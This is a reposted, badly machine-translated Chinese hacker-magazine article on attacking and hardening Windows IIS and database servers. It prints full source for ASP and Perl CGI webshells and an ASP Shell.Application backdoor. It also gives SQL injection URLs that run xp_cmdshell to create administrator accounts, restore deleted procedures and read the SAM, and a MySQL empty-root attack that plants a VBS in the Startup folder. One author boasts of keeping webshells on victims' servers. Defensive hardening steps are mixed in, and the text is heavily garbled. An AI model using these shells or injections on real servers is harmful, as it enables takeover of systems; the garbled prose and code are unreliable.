2. Tech
  3. MSSQL injection attack server and protection (transfer)

MSSQL injection attack server and protection (transfer)

xiaoxiao2021-03-06  40

Author: Alpha

The article was published in the 5th issue of the hacker defense line. It is a few people to write, and there is no name, the only sentence that I want to say is fk black defense!

Winnt System Under Permissions Settings with Hackers: On Servers on Various Networks, as long as hackers can successfully invade different configurations of different configurations, they will receive certain permissions, compare guest or system permissions, but these permissions are due to server If the administrator is not configured or lack of management experience, it will successfully invade the hacker. As long as we add certain permissions to various dangerous components and orders, it will get the greatest security. Let's introduce the sufficiency of the permissions and hackers under the NT system. Of course, the NT server cannot be a FAT32 partition. Your NT server must use the NTFS partition, because only NTFS can give your server important file settings permission, if it is FAT32 The partitioned, then there is no security, and the following introductions some intrusion prevention instances will know the importance of setting permissions. With the rapid development of the network, now friends are installed with broadband network, and the provider business that is virtual host business is of course getting better and better. Friends who do websites are more than the years, but now the hackers are I like to put a WebShell in the space of the virtual host provider to obtain the server's management, which is the most headache of the administrator of the server. The hackers can run the cmd command in the server through a variety of WebShells, and can copy, delete files, online editing files, and build superusers. Webshell (also called webpage Troja) is a variety of things here, such as ASP, CGI, PHP, JSP's WebShell, now popular XP_cmdshell, etc., all of which are the Webshell, now we introduce it first. The hackers are called the attack and prevention methods of various WebShells of webpage Trojans. At the same time, this simplest security setting method can also prevent most of the overflow attacks on the network, such as the famous IDQ, IDA, WebDAV and RPC overflow ..., you can make hackers get the management of your server, but you pass This small security configuration, the hacker's overflow attack you will not be afraid. Even if you don't make a patch, it is safe. I believe? Do not believe? Please see below! The attack and prevention method are actually very simple, so it is generally familiar with the web production, and the friends who know the cmd command can learn, and in my opinion, there is no big technical speech, the difficulty level (primary) is everyone It can be learned, but this tutorial can be used as a Web website server administrator whether you have many years of server management experience or novice, this tutorial can serve as a method of preventing WebShell attack and overflow attacks. . I. Basic ASP WebShell Attack and Prevention Under Understand ASHELL Attack and Preventive Method (and Provide Webshell Source Codes): An Example, Use Script Binding CMD Command: This is a script binding At the attack method of the CMD command, in fact, the ASP's WebShell does not stop this, and there will be two WebShell attack and prevention methods. As long as the hacker put this webhell on your server, you don't have an appropriate method of prevention, then your server will suffer from poisonous hands and become a hacker's broiler. The server that is generally killed by this poisonous hand is a server that is a virtual host provider. It is also a server that belongs to individual or company. How is hacker to pass this WebShell to your server? If it is transmitted to the web space of the virtual host provider, it is generally a virtual host provider's own ^ _ ^, because the virtual service provider's customer itself has the permission of the upload software, and HTTP service Browse the address. Customers use this WebShell purpose to see what files stored in the server space you lease or through this WebShell theft server.

What do individuals or company's servers, how to pass this webhell to the server space? Oh, it is generally a script vulnerability on the server, downloading the system's script vulnerability, and obtains this WebShell to your server by using these vulnerabilities to upload files on the WWW 80 port or use the TFTP service through some vulnerabilities to transfer this WebShell to your server. Since we only explain how these WebShell attacks here, don't mention how to pass this WebShell to the server space, this article assumes that you have passed this WebShell to the server space, you and get http The browsing address, as long as the server is supported, you can use this WebShell to obtain the management power of the server system. This back door is very hidden, even if you reload N times, the patch of N is ure, Because this vulnerability is there is no patch ^ _ ^, as long as this Webshell still exists, hackers find this WebShell's WWW browsing address, your server will become hacked broilers, so it is extremely harmful. As shown in the figure below, I passed a file name called cmd.asp to the webshell file to a server IP 192.168.0.18, put this file into the WebShell folder in the FTP root directory, we will You can use http://192.168.0.18/webshell/cmd.asp to access this WebShell, we can enter all cmd commands in that blank form, such as Dir C: / etc., if you want to be on this A ultra user is created in the server, you can enter two lines commands, the first line enters the NET user Netpk Hacker / ADD and then click the execution cmd command button to create a normal user Netpk, then enter the second line command, NET localgroup administrators Netpk / Added the ordinary user Netpk, the ordinary user Netpk, joined the superuser management stage Administrators group. Through these, we can determine this WebShell has all the cmd command permissions. What do you want to do, don't teach you, huh, huh ^ _ ^.

The source code for this cmd.asp script is attached: execute the command:
<% DIM OSCRIPT DIM OSCRIPTNET DIM OFILES, OFLOLE DIM SZCMD, SZTEMPFILE SZCMD = Request.form (". Cmd") 'Get cmd on the input box error Resume Next 'If an error occurs, skip, an error pop-up window to prevent set oScript = server.createobject ( "WSCRIPT.SHELL")' establishment shell (wshshell) objects set oFileSys = server.createobject ( "scripting.filesystemobject") szTempFile = "C: /" & OfileSys.getTempName () 'getTempName () is a method of FSO to establish temporary files ("cmd.exe / c" & szcmd & "> & sztempfile, 0, true)' Call the RUN of the WSHSHELL function to execute the command and redirect it into the temporary folder set ofile = OfileSys.OpenTextFile (SztempFile, 1, False, 0) 'to open temporary file%>

" Method = "post"> 
 <% on Error Resume next response.write server.htmlencode (ofile. Readall) 'Output The encoded file content ofile.close' Close file call ofilesys.deletefile (sztempfile, true) 'Prevent it from being seized, so delete file%>  


You only need to write the above code in Notepad, save the extension as .asp, you can run it to your virtual host space. There are several script attack prevention methods for this binding cmd command. In fact, if you want to prevent this attack, you only need to delete the FSO (Scripting.FileSystemObject) function in the ASP, deleting the FSO permission method is in CMD The command prompt is entered the following command: regsvr32/crrun.dll Note: To change the actual path to your local system installation directory when actual operation, but use this method to delete too much If we want to use FSO permissions, we can't use it. So it is recommended not to use this method to delete FSO permissions, but it is obvious, if this is done, anyone including site system administrator will not use FileSystemObject object, which is not the site management person to get As a result, after all, we can use this object to achieve a convenient online platform management. If the system administrator is not used, it will not be paid, but this dangerous object will bring security vulnerabilities to their sites. So there is no way to have a good way? Have! The specific method is as follows: We can do other people from illegally using the FileSystemObject object, but we can still use this object. The method is as follows: Find the hkey_classes_root / scripting.FileSystemObject key value to make it a string you want. right -> "rename"), such as changes become HKEY_CLASSES_ROOT / Scripting.FileSystemObject2 this way, so it is necessary to reference the object in the ASP: Set fso = CreateObject ( "Scripting.FileSystemObjectnetpk") can not be used: Set fso = CreateObject ( "Scripting.filesystemObject") If you use the usual method to call the FileSystemObject object, you will not be able to use it. Oh, as long as you don't tell others, this changed object name, others cannot use the FileSystemObject object. In this way, as a site manager, we will put an illegal use of the FileSystemObject object, and we can still use this object to make it easy to implement the website online management! But this is still a certain harmful, because the method of this configuration is not very perfect. Just simply solve the FSO calling cmd command and some simple ASP Trojan scripts. To know that WebShell is only a kind of asp, such as CGI, PHP, JSP, etc. There is such a WebShell, if your server configures support CGI , PHP, JSP, etc., that is, because of these WebShells such as CGI, you do not need to support WebShell. So you have to look down, there are some WebShells worth noting. In fact, there is a simple and practical method to prevent this WebShell that uses the ASP script to bind the cmd command. The configuration prevention method only needs to be 30 seconds, and the method of preventing the method, etc., the WebShell, etc., because as long as one The method of preventing these script attacks and overflows, etc.


Example 2, using FSO permissions on file management WebShell attack and prevention method The following we describe the top ASP Trojan, this WebShell can be changed, edited, deleted, moved, uploaded, downloaded, downloaded, downloads any files on the server via web online. As long as the hacker passes this ASP Trojan, all the files on your server will control in the hacker's hand, what hacker can do in your server? It is mentioned above. Change, delete, move ... As shown below: See this chart, you can imagine your server to the end, how will you become, your server will have no privacy, want to black your server The home page or delete the file on your server can do it. There are downloads on each hacker website on this ASP Trojan network, and the source code is inconvenient to write. Prevention method: As an example, here is no longer rear. Remnant: Is that it is the WebShell for ASP to close the FSO or give the FSO to change the name in the registration form? This is not the case, because there is another kind of ASP Trojan that does not require FSO to support, although it is not very powerful, but it is necessary to black a website, the function is already very enough, this kind of Trojan Defense. Please see Example III below.


Example 3: ASP Troja, which can be used to use, is ASP Trojan, which can be used for this free FSO, due to less FSO's support, of course, is of course not very powerful, only browsing the server The file directory, copy, mobile file, execute the program files such as the specified path. It is worth noting that most of the virtual host providers still have this vulnerability, it seems that this vulnerability network tester is not well maintained. The following is the legend that appears when you browse this ASP Trojan. There is also the same vulnerability even if the server of the hacking base is also. With the results of my test, you can easily obtain the management right of the hacking base, but people say that I am a black base, so I don't do this. (Edit Comrade, I wrote the black foundation you can delete, because the black-based server is not safe, and the grass people have come in to help them visit. Just I have no mood to inform those brags B, my own server It is not good to maintain, but also talked people's safety maintenance of the cattle. As for the black foundation, there is no such loopholes. I don't know, because I have no mood to test.) You can pass this free FSO support ASP Trojans arbitrarily copy and move and execute programs on the server, which is just simple, but it is already enough to use it to black a website. For example, we can move the homepage of the website to other places, then we will replicate a hacker page that is the same name. Use the execution program to allow the server to perform any Trojan program to obtain the server's admin management.


I will give this free FSO-free ASP source code. The code is as follows: <% response.write " Only one action can only be performed at a time:) "%> <% response .write now ()%> 
 The physical path where the program is located: <% response.write request.servervariables ("Appl_Physical_Path")%>   asp's shell.application backdoor </ title> <body> < Form action = "<% = Request.serverVariables (" URL ")%>" Method = "post"> <input value = text name = text value = "<% = szcmd%>"> Enter the directory you want to browse <BR > <input type = text name = text1 value = "<% = szcmd1%>> COPY <input type = text name = text2 value =" <% = szcmd2%>> <br> <input type = text name = Text3 value = "<% = szcmd3%>"> Move <input type = text name = text4 value = "<= SZCMD4%>"> <br> path: <input type = text name = text5 value = "<% = SZCMD5%>> Program: <input type = text name = text6 value = "<% = szcmd6%>"> <br> <input type = submit name = sb value = send command> </ form> </ body > </ html> <% szcmd = request.form ("text") 'directory browsing if (SZCMD <> ") THEN SELL = Server.createObject (" shell.application ")' Established shell object set FOD1 = shell .NameSpace (SZCMD) Set FoduItems = FOD1.Items for Each Co in Foditems Response.write <fo Nt color = red> "& co.path &" ----- "& co.size &" </ font> <br> "Next End IF%> <% SZCMD1 = Request.form (" Text1 ") ' Catalog copy,</p>
<p>Coped SZCMD2 = Request.form ("Text2") if Szcmd1 <> "" and szcmd2 <> "" "and SHELL1 = Server.createObject (" shell.Application ") 'Established shell object set FOD1 = shell1.namespace (szcmd2) for i = len (szcmd1) to 1 Step -1 if MID (SZCMD1, I, 1) = "/" THEN PATH = Left (SZCMD1, I-1) EXIT for end if next if len (path) = 2 THEN PATH = PATH & "/" Path2 = Right (SZCMD1, LEN (SZCMD1) -i) Set FOD2 = shell1.namespace (PATH) SET FODITEM = FOD2.PARSENAME (PATH2) FOD1.COPYHERE FODITEM RESPONSE.WRITE "Command Complata "end if%> <% szcmd3 = request.form (" text3 ") 'directory mobile SZCMD4 = Request.form (" text4 ") if szcmd3 <>" "and szcmd4 <>" "" "and szcmd4 <>" "" "" and szcmd4 <> "" "" "" and szcmd4 <> "". CreateObject ("shell.application") 'Established shell object set FOD1 = shell2.namespace (szcmd4) for i = le (SZCMD3) TO 1 Step -1 if MID (SZCMD3, I, 1) = "/" THEN PATH = Left (SZCMD3, I-1) EXIT for end if next if len (path) = 2 THEN PATH = PATH & "/" Path2 = Right (SZCMD3, LEN (SZCMD3) -i) Set FOD2 = shell2.namespace (PATH) SET FODITEM = FOD2.PARSENAME (PATH2) FOD1.MOVEHERE FODITEM RESPONSE.WRITE "Command Complated Success!" END IF%> <% szcmd5 = request.form ("text5") 'Execute the program to specify path SZCMD6 = Request.form ("text6") if szcmd5 <> "" and szcmd6 <> "" "SELL3 = Server.createObject (" shell .application ") 'Established shell object shell3.namespace (szcmd5) .Items.Item (szcmd6) .Invokeverb response.write" Command Command Complated Success! "End IF%></p>
<p>You only need to write the above code in Notepad, save the extension as .asp, you can run it to your virtual host space. The ASP Trojan method for preventing FSO support is as follows: Through the above code, we can see that the shell of this code is to establish a shell object through Shell.Application, and we only look for key value shell.Application and WScript in the registry. The shell key value, then remove these key values, you can prevent this type of ASP Trojan attack, delete these key values ​​will not affect your server and ASP support, so please delete it. Second, constructing the FSO threats The virtual host is now disabled with the standard components of the ASP: FileSystemObject, because this component provides powerful file system access capabilities for ASP, read any files on the server hard disk , Write, copy, delete, rename, etc. (of course, this refers to the Windows NT / 2000 that is used by default). But after prohibiting this component, the consequences caused by all ASPs that use this component will not be able to run, and cannot meet the needs of customers. How to allow both FileSystemObject components, do not affect the security of the server (ie: Different virtual host users can not use the component to read and write the files)? Here is a method that I have obtained in the experiment, which is described below with Windows 2000 Server as an example. Open the resource manager on the server, right-click the drive letter of each hard disk partition or volume, select "Properties" in the pop-up menu, select the Security tab, you can see which accounts can be accessed to access this partition Volumes and access rights. After the default installation, "Everyone" has full control. Add "Administrators", "Backup Operators", "Power Users", "Users", etc., and give "full control" or corresponding permissions, pay attention, do not give "Guests" group, "IUSR_ machine name" these accounts any permissions. Then, "Everyone" group is then deleted from the list, so that only authorized groups and users can access this hard disk partition, and when the ASP is executed, it is access to the hard disk as "IUSR_ machine name", this is not given here User account permissions, ASP can also read and write files on the hard disk. The following is to set a separate user account to each virtual host user, and then assign each account to a directory that allows its fully controlled. As shown in the figure below, open "Computer Management" → "Local User and Group" → "User", click the right mouse button in the right column, select "New User" in the pop-up menu:</p>
<p>In the "New User" dialog box in the pop-up, "User Name", "Full Name", "Description", "Password", "Confirm Password" are entered according to actual needs, and the "user must change the password next time" The right pair is removed, and "the user cannot change the password" and "password never expire". This example is a built-in account "IUSR_VHOST1" that establishes an anonymous access Internet information service for the user of the first virtual host, ie: all clients use http: //xxx.xxx.xxxx/ to access this virtual host, Identity to access. Enter the completion of the "creation". You can create multiple users according to actual needs, and after the creation is complete, "Close":</p>
<p>Now the newly established user has appeared in the account list, double-click the account in the list to further set:</p>
<p>In the pop-up "IUSR_VHOST1" (ie, the new account just created) Properties dialog box: Subordinate "tab: The original account is default is" Users "group, selecting the group, point" delete ":</p>
<p>Now, as shown in the figure below, then "Add" again:</p>
<p>Find "Guests" in the "Select Group" dialog box that pops up, click "Add", this group will appear in the text box below, then click "OK":</p>
<p>The appearance is the content shown below, click "OK" to close this dialog box:</p>
<p>Open the Internet Information Services, start setting the virtual host, in this case to explain the "first virtual host" setting as an example, right-click the host name, select "Properties" in the pop-up menu:</p>
<p>A "first virtual host properties" dialog box is popped, and you can see the use of the virtual host user from the dialog box: F: / vhost1 "folder:</p>
<p>Temporarily, no matter what the "First Virtual Host Properties" dialog, switch to "F: / Vhost1" folder, right click, select the "Properties" → "Security" tab, at this time It can be seen that the default security setting of the folder is "Everyone" full control (depending on the content displayed by different situations), first "allowing the inheritance of the inheritance from the parent to the object" to the object ". Remove the right:</p>
<p>At this point, "Security" warning as shown below is popped, click "Delete":</p>
<p>All groups and users in the Security tab will be empty (if not clear, use "Delete" to empty it), then click the "Add" button.</p>
<p>Add "administrator" as shown in the figure, add the new account "IUSR_VHOST1" created in the previous, will give full control permissions, but also add other groups or users according to actual needs, but must not put "guests" group , "IUSR_ machine name" these anonymous access to the account added!</p>
<p>Switch to the previously opened "First Virtual Host Properties" dialog, open the "Directory Security" tab, "edit": "Edit":</p>
<p>In the "Verification Method" other box (shown below), click "Edit":</p>
<p>The "Anonymous User Account" popped up, the default is "IUSR_Merical Name", click "Browse":</p>
<p>Find the new account "IUSR_VHOST1" created in the "Select User" dialog box, double click:</p>
<p>At this point, the anonymous username is changed, and when entering the previous creation in the password box, the password set for the account:</p>
<p>Determine the password again:</p>
<p>OK, complete, click OK to close these dialogs. After this setting, the "first virtual host" user uses the ASP's FileSystemObject component to access its own directory: F: / vhost1, when trying to access other content, there will be, such as "no permissions", "The hard disk is not ready", "500 server internal error" and other errors prompts. Another: If the user needs to read the partition capacity of the hard disk and the serial number of the hard disk, the setting will not be read. If you want to read these and the entire partition related content, right click on the partition (volume) of the hard disk, select "Properties" → "Security", add this user's account to the list, and give at least "read "Permissions. Since the subdirectory under this volume has been set to "Prohibit the transfer of the inheritance rights from the parent to this object", the permission settings of the subdirectory below are not affected.</p>
<p>Third, based on CGI, PHP, JSP WebShell and overflow attacks and prevention CGI, PHP, JSP scripts can also bind the cmd command, but is the basic CGI's WebShell function permission and prevention method is the same? The answer is that their Webshell permissions are the same, and the way to use scripts, but the method of preventing the use of scripts is completely different. Support, so even if you turn the FSO object, remove the shell.Application and WScript.Shell key values ​​in the ASP's WebShell in the registry, and cannot prevent these scripts WebShell. Since ASP, CGI, PHP, JSP Bind the CMD command through the script is small, it can fully prevent such attacks in this type of attack, in this case, I will put one A security configuration can be completed within 30 seconds, so that any script does not call your CMD command remotely to achieve the purpose of complete preventive script binding CMD. WebShell's attack method we are here for a last example. Below: CGI's WebShell attack and prevention as shown below, as long as hackers pass a cmd.cgi's WebShell to your server, hackers can call the cmd command in your server and can run all your servers. CMD command, such as establishing a superuser, etc., the following figure is to run the DIR C: / command using this cmd.cgi's WebShell. If the hacker has passed this stuff on your server, huh, you want to cry without tears. Even if you reload the N-times server system, play N more patch, useless, as long as you don't delete this Webshell, hacker knows this Webshell's www browsing address, you can always use your machine as broiler. I used to invade the broiler left this stuff in the other's virtual host directory. I called him not to die. As long as the other party does not delete this Webshell, then his server is always my broiler, because this east East anti-virus software can't be found. The code for this cmd.cgi is given below (there are many hackers on the network to provide downloads):</p>
<p>Use cgi qw (: standard); print header (-charSet => GB2312); $ cmd = param ("cmd"); $ out = `$ cmd 2> & 1`; Print Start_form, TextField (" cmd ", $ cmd , 60); Print End_form; Print Pre ($ OT);</p>
<p>The above is this WebShell code, and some of the WebShells such as PHP and JSP. It will not be introduced here, because the attack and prevention methods are similar, through these examples, we see these WebShells are called NT. The cmd.exe command under the system is executed, as long as we set a certain permissions to the cmd.exe file under the NT system, huh, then the hacker's WebShell will have no use. For safety, we have to make permission settings for dangerous commands such as Net.EXE CaCls.exe Telnet.exe TFTP.EXE TFTP.EXE FORMAT.com Mountvol.exe Mshta.exe. Because these dangerous documents are user access and execution of users to be allowed by the guests, only the permissions are set for these files, so that true security can be ensured. These dangerous files are stored in the directory of C: / Winnt / System32 in the case of default. To set permissions, as shown below, clear all other users to access these commands, and then set only the permissions that allow you to use these commands, such as the super user name you are using is administrator. You only allow users named Administrator to use these commands in the permission settings.</p>
<p>Through these simple settings, you can make those WebShell that binds the cmd command in your server, simple enough. :) And also prevent your server from being binding the cmd command to log in to your server after being sucked by the hacker, the reason is simple, such as the current WEBDAV overflow, these overflow attacks are hackers after overflow your server Bind your CMD command in your server, then Telnet login to your server, get system management rights on your server, but after the hacker overflows, it is only necessary to use System permission to bind your server's cmd command, And you have set the cmd command to disable SYSTEM access, you can only use the unique one you set to access the CMD command. Therefore, even if the hacker successfully overflows, you can't bind your CMD command. If hackers can't land your server, your server is safe. But this can only be relatively safe, because some overflow attack hackers can pass the reverse connected Trojan file to your server and can run. Oh, if the recent SERV-U overflow, if your FTP server uses Serv-U, you have not hit the latest security patches, let hackers have been overflow, then hackers can not bind your cmd command to log in. You Server, but gives your server to pass a reverse connected Trojan back door, which is connected to the hacker's machine through your server, and hackers can listen in their own machine, as long as your server This back door, then even if your server is installed, the firewall is installed, and the hacker cannot connect to the back door of the Trojan with your server, but the hacker gives you a reverse connected Trojan, this Trojan is passed Your server connects the hacker's machine, as long as your server issues a connection request to hackers, hackers can get the control of your server, and this reverse Trojan attack can completely do not rely on CMD under the NT system. It can be reversely connected to the harm of Trojans. So if we prevent this inverse Trojan attack? The method is simple, that is, installing a firewall with preventing reverse connecting Trojans, such as Tianwang and Blackice firewall. They are all prevented from reverse connection, because these firewalls have an application to access the network rights setting function. Any program on the server is to access the network, which will pop up a warning window. You must have the server to agree to allow the application to access the network, which is just used to prevent reverse Trojans. Let's take an example, such as your server installed the Tianwang firewall, such as hackers successfully overflow your serv-u server, and send you a reverse connection back door Trojan, this back door Trojan in your server C: /Mm.exe, the IP address in which the hacker is located is 192.168.0.18. Now the hacker is connected to the reverse of your server. As long as the hacker runs this reverse Trojan on your server, then your Tianwang firewall will Pop up a warning window, as shown below:</p>
<p>We can see the truly IP address of the hacker and hacker using this reverse Trojan, the protocol used in this warning window, and this reverse connection Trojan is in your server's location, as long as you click the forbidden button This program will not connect the hacker's machine, I believe you will not be so stupid, click to allow this back door to connect the hacker machine, where you didn't click Allowed, this back door would not connect the hacker's machine. :) Through this example, we can see that as long as we give some dangerous orders such as CMD settings, then install a firewall that prevents reverse connecting Trojans, then those so-called overflow attacks will not cause your server. Harm. Fourth, MSSQL injection protection (this article is written by this member alpha) MSSQL injection attack is a more direct and harmful attack method, and those so-called hackers can use it directly to obtain system privileges. Today, let's take a look at how to prevent this attack through system settings: first, it is not to ensure that your server is safe, safety is a whole, but the whole is made up of these parts. ! Countermeasure 1: Pseudo hacker: Suppose this place can be injected into http: //localhost/bbs/news.asp? Id = 5 We tend to attack http://localhost/bbs/news.asp? Id = 5 ; exec master.dbo.xp_cmdshell 'net user alpha / add' ---</p>
<p>http://localhost/bbs/news.asp? id = 5; exec master.dbo.xp_cmdshell 'net loclagroup administrators alpha / add' ---</p>
<p>Ok, Alpha is already a system administrator! Manager: How to prevent it? See how they implement, by calling the XP_cmdshell in the extended stored procedure in SQL, (as shown below)!</p>
<p>We only need to right-click to delete this extension store, the above attack method does not work! Of course, you can also use the following: sp_dropextendedproc 'xp_cmdshell' to remove XP_cmdshell</p>
<p>Countermeasure 2: Hacker Countermeasures, if the XP_cmdshell extension in the MSSQL database is deleted, don't be afraid, we still have a way! http://localhost/bbs/news.asp? id = 5; exec master.dbo.sp_addextendedproc xp_cmdshell @ dllname = 'xplog70.dll'; - through such a one of us, XP_cmdshell is restored. Manager: Rely, it seems that our setting is not complete enough, searching XPLog70.dll directly in C</p>
<p>I found it, deleted it, ok, this world is quiet, at least the help will not directly implement system instructions! ! Countermeasure 3: Pseudo hacker: Do you think this is this? You are wrong, huh, huh, I still have a lot! As long as you use a SA account, I still have a method http://localhost/bbs/news.asp? Id = 5; exec Xp_regread 'HKEY_LOCAL_MACHINE', 'Security / Sam / Domains / Account', 'F' Look, maybe we can get the administrator's password! Add a startup item to nature is not there. Manager: It seems that I have to go down, see me, I delete these extensions all deleted XP_regaddMultiTISTRING (Add Item to the Registry) XP_REGDELETEKEY (remove a key from the registry) xp_regdeletevalue (remove one from the registry Key Value) XP_REGENUMVALUES (key value under primary keys) XP_REGREAD (key value under a primary key) XP_REGREMOVEMULTISTRING (Remove item from the registry) XP_REGWRITE (write data to the registry) Seeing you arrogant, huh, you want to Inside the registry, there is no door! Countermeasure 4: Pseudo hacker: Do not let the registry even if you do anything else! Can I add a SQL administrator? Really! http://localhost/bbs/news.asp? id = 5; exec master.dbo.sp_addlogin alpha; - http://localhost/bbs/news.asp? id = 5; exec master.dbo.sp_password null, Alpha, alpha; - http://localhost/bbs/news.asp? id = 5; exec master.dbo.sp_addsrvrolemember sysadmin alpha;-see, say that XP_cmdshell can be used on that day, I will manage Well! Manager: Forget it, I don't have to be with you, I don't have to connect the database without SA? I built a low permission, such as building a database named BBS and then built a account named BBS, then set it out to the BBS user, give him some basic permissions,</p>
<p>Ok, if you use this user to connect the BBS database, it is much more secure relative to SA! There are many other many such: Remove the extra system stored procedure sp_bindsession sp_cursor sp_cursorclos sp_cursorfetch sp_cursoropen sp_cursoroption sp_getbindtoken sp_GetMBCSCharLen sp_IsMBCSLeadByte sp_OACreate sp_OADestroy sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_OAStop sp_replcmds sp_replcounters sp_repldone sp_replflush sp_replstatus sp_repltrans sp_sdidebug xp_availablemedia xp_cmdshell xp_deletemail xp_dirtree xp_dropwebtask xp_dsninfo xp_enumdsn xp_enumerrorlogs xp_enumgroups xp_enumqueuedtasks xp_eventlog xp_findnextmsg xp_fixeddrives xp_getfiledetails xp_getnetname xp_grantlogin xp_logevent xp_loginconfig xp_logininfo xp_makewebtask xp_msver xp_perfend xp_perfmonitor xp_perfsample xp_perfstart xp_readerrorlog xp_readmail xp_revokelogin xp_runwebtask xp_schedulersignal xp_sendmail xp_servicecontrol xp_snmp_getstate xp_snmp_raisetrap xp_sprintf xp_sqlinventory xp_sqlregister xp_sqltrace xp_sscanf xp_startmail xp_stopmail xp_subdirs xp_unc_to_drive periodically check user logins Use master Select name, Password Accdate from syslogins order by name, I said today! In fact, MSSQL's injection attack defense has a lot of things! For example, exporting special documents, cracking the website password, too much, today is simply introducing these or even I want to say, even if you set this setting, your system is still dangerous, still fragile! To get a safer configuration, continue to pay attention to the server focus! ! !</p>
<p>5. Simple mysql database intrusion prevention issues (this article written by server focus member Lonely, a bit bad) on the network, many systems (Win2K, Linux) have a MySQL database. Indeed, this database is very popular, but such a popular database has a vulnerability - it is a database's root's account password is empty, and now many machines have such problems.</p>
<p>I have scanned a Class C address, and I found that the database root password is more than 89 machines, because MySQL can call the XP-shell command as the MSSQL database, so many people find such a vulnerability will not be utilized. Let me introduce it, how to use the root password of Win2K as an empty database:</p>
<p>If you install MySQL on your machine, you can use the following command: #mysql -u root -h 192.168.0.1 After the connection is successful, see what the server is available: mysql> show Databases MySQL is mysql, TEST these two database. Mysql> Use test After entering TEST, see what data is there: mysql> Shows Tables, then I haven't built a new table inside: mysql> create table lonely (abc text) Here I created a table name For the LONELY, the field is the form of ABC. We write a command to increase the user who adds admin, password 123. As follows: mysql> INSERT INTO AVALUES ("" "" ws cript.shell ")") "); mysql> Insert Into Avalues ​​(" a = wshshell.Run ("" cmd.exe / c net admin 123 / add "", 0) "); mysql> INSERT INTO AVALUES (" cmd.exe / c net localgroup administrators admin / add "", 0); see if there is any wrong place: mysql > SELECT * FORMA Output Table as a script file for a VCS: mysql> select * from ainto autfile "c: // Docume ~ 1 // alluse ~ 1 // [Start] menu // Program //CESHI.VBS"; Take the contents in the table to the startup group, is a VBS script file! Note "/" symbol. Now all the work is complete, the machine will restart, the machine restarts, CESHI.VBS will start At the time, there is a user in the machine to be admin, the password is: 123 superuser.</p>
<p>Defense method: The easiest way to defense in this attack method is to increase passwords for MySQL root users. The method is as follows: Local setting password: mysql uroot password password remote setting password: grant select, update, delete on * .. * to root @ "Identified by" password "as follows: mysql> grant select, update, delete on * .. * TO ROOT @ "Identified by" 123 "> / c mysql> grant select, update, delete on * ..1" 123 "query ok, 0rous affected <0 34 See></p>
<p>Editor: I hope that I have to give some help from all my friends. I have a lot of shortcomings. Because I don't have much time, I don't have much more detailed time. If you need to learn more Server attack, defense knowledge, please visit the server focus website http://www.serverfocus.net or http://www.cnhack.cn. If you have any questions and suggestions, please send E-mail to Netpk@cnhack.cn</p>
<p>(Transfer from http:/blog.9cbs.net/amh/archive/2004/12/205072.aspx Saibui's personal website)</p></div><div class="text-center mt-3 text-grey">
转载请注明原文地址:https://www.9cbs.com/read-54425.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>)
</div><div></div></div></div><ul class="postlist list-unstyled">


</ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="54425" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved
                

</div><div class="col text-right">Processed:
<b>0.053</b>, SQL:
                <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script>
var debug = DEBUG = 0;
var url_rewrite_on = 1;
var url_path = './';
var forumarr = {"1":"Tech"};
var fid = 1;
var uid = 0;
var gid = 0;
xn.options.water_image_url = 'view/img/water-small.png';
</script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script>
var forum_url = 'list-1.html';
var safe_token = '_2BQz6DttbmkO7fMAmaYrD4xzhlJpj1mmG9cfOwQ129qKjhDkn_2FjDuPr0rmPn1UsBDUzGc1jY7hCP3VkIn8Aa_2BQw_3D_3D';
var body = $('body');
body.on('submit', '#form', function() {
var jthis = $(this);
    var jsubmit = jthis.find('#submit');
jthis.reset();
jsubmit.button('loading');
var postdata = jthis.serializeObject();
$.xpost(jthis.attr('action'), postdata, function(code, message) {
if(code == 0) {
location.reload();
} else {
$.alert(message);
jsubmit.button('reset');
}
});
return false;
});


function resize_image() {
var jmessagelist = $('div.message');
var first_width = jmessagelist.width(); 
jmessagelist.each(function() {
var jdiv = $(this);
var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width();
var jmessage_width = Math.min(jdiv.width(), maxwidth);
jdiv.find('img, embed, iframe, video').each(function() {
var jimg = $(this);
var img_width = this.org_width;
var img_height = this.org_height;
if(!img_width) {
var img_width = jimg.attr('width');
var img_height = jimg.attr('height');
this.org_width = img_width;
this.org_height = img_height;
}

if(img_width > jmessage_width) {
if(this.tagName == 'IMG') {
jimg.width(jmessage_width);
jimg.css('height', 'auto');
jimg.css('cursor', 'pointer');
jimg.on('click', function() {

});
} else {
jimg.width(jmessage_width);
var height = (img_height / img_width) * jimg.width();
jimg.height(height);
}
}
});
});
}


function resize_table() {
$('div.message').each(function() {
var jdiv = $(this);
jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); 
});
}

$(function() {
resize_image();
resize_table();
$(window).on('resize', resize_image);
});


var jmessage = $('#message');
jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); });
jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); });

$('#nav li[data-active="fid-1"]').addClass('active');
</script>